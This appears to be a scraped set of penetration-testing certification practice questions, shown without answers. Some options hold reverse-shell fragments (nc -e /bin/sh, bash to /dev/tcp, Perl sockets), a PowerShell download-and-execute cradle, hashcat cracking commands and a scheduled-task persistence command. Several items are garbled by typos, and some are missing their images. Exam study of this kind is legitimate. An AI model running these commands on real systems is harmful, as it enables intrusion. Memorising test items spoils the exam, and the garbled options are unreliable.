HOTSPOT
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
Hot Area:
DRAG DROP
A technician is reviewing the following report. Given this information, identify which vulnerability can be definitively confirmed to be a false positive by dragging the “false positive” token to the “Confirmed” column for each vulnerability that is a false positive.
Select and Place:
A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?
A. perl -e ` use SOCKET'; $i='
B. ssh superadmin@
C. nc -e /bin/sh
D. bash -i >and /dev/tcp/
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed this command?
A. Set the execution policy
B. Execute a remote script
C. Run an encoded command
D. Instantiate an object
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable penitence
C. To report persistence
D. To check for persistence
A tester has captured a NetNTLMv2 hash using Responder Which of the following commands will allow the tester to crack the hash using a mask attack?
A. hashcat -m 5600 -r rulea/beat64.rule hash.txt wordliat.txt
B. hashcax -m 500 hash.txt
C. hashcandt -m 5600 -a 3 haah.txt ?a?a?a?a?a?a?a?a
D. hashcat -m 5600 -o reaulta.txt hash.txt wordliat.txt
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?
A. Badge cloning
B. Lock picking
C. Tailgating
D. Piggybacking
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
A. schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run
B. net session server | dsquery -user | net use c$
C. powershell andand set-executionpolicy unrestricted
D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
A systems security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner workings of these applications?
A. Launch the applications and use dynamic software analysis tools, including fuzz testing.
B. Use a static code analyzer on the JAR files to look for code quality deficiencies.
C. Decompile the applications to approximate source code and then conduct a manual review.
D. Review the details and extensions of the certificate used to digitally sign the code and the application.
At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client's website. Which of the following approached should the penetration tester take?
A. Run a spider scan in Burp Suite.
B. Use web aggregators such as BuiltWith and Netcraft
C. Run a web scraper and pull the website's content.
D. Use Nmap to fingerprint the website's technology.
During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?
A. Update to the latest Microsoft Windows OS.
B. Put the machine behind the WAF.
C. Segment the machine from the main network.
D. Disconnect the machine.
When considering threat actor scoping prior to an engagement, which of the following characteristics makes an APT challenging to emulate?
A. Development of custom zero-day exploits and tools
B. Leveraging the dark net for non-attribution
C. Tenacity and efficacy of social engineering attacks
D. Amount of bandwidth available for DoS attacks
Given the following Python code:
a = 'abcdefghijklmnop'a[::2]
Which of the following will result?
A. adgjmp
B. pnlhfdb
C. acegikmo
D. ab
A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?
A. Redirect the user with a CSRF.
B. Launch the website in an iFRAME.
C. Pull server headers.
D. Capture and replay a session ID.